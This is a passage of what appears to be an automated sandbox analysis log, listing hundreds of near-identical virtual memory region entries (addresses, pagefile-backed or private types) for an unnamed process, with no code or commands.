pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21158 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21159 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21160 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21161 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21162 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21163 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001800000" filename = "" Region: id = 21164 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21165 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21166 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21167 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21168 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21169 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21170 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21171 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21172 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21173 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21174 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21175 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21176 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21177 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21178 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21179 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21180 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21181 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21182 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21183 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21184 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21185 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21186 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21187 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21188 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21189 start_va = 0x2a0000 end_va 
= 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21190 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21191 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21192 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21193 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21194 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21195 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21196 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21197 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21198 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21199 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21200 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21201 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
21202 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21203 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21204 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21205 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21206 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21207 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21208 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21209 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21210 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21211 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21212 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21213 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21214 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 21215 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21260 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21261 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21262 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21263 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21264 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21265 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21266 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21267 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21268 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21269 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21270 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21271 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21272 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21273 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21274 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21275 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21276 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21277 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21278 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21279 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21280 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21281 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21282 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21283 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21284 start_va = 0x2a0000 end_va = 0x2affff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21285 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21286 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21287 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21288 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21289 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21290 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21291 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21292 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21293 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21294 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21295 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21306 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21307 start_va 
= 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21308 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21309 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21310 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21311 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21312 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21313 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21314 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21315 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21316 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21317 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21318 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21319 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 21320 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21321 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21322 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21323 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21324 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21325 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21326 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21327 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21328 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21329 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21330 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21331 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21332 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 21333 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21334 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21335 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21336 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21337 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21338 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21339 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21340 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21341 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21342 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21343 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21344 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21345 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21346 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21347 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21348 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21349 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21350 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21351 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21352 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21353 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21354 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21355 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21356 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21357 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21358 start_va = 0x2a0000 end_va 
= 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21359 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21361 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21362 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21363 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21364 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21365 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21366 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21367 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21368 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21369 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21370 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
21371 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21372 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21373 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21374 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21375 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21410 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 21411 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 21412 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 21413 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 21414 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21415 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21416 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21417 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 21418 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21419 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21420 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21421 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21422 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21423 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21424 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21425 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21426 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21427 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21428 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21429 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21430 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 21431 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21432 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21433 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21434 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21435 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21436 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21437 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21438 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21439 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21440 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21441 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21442 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21443 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
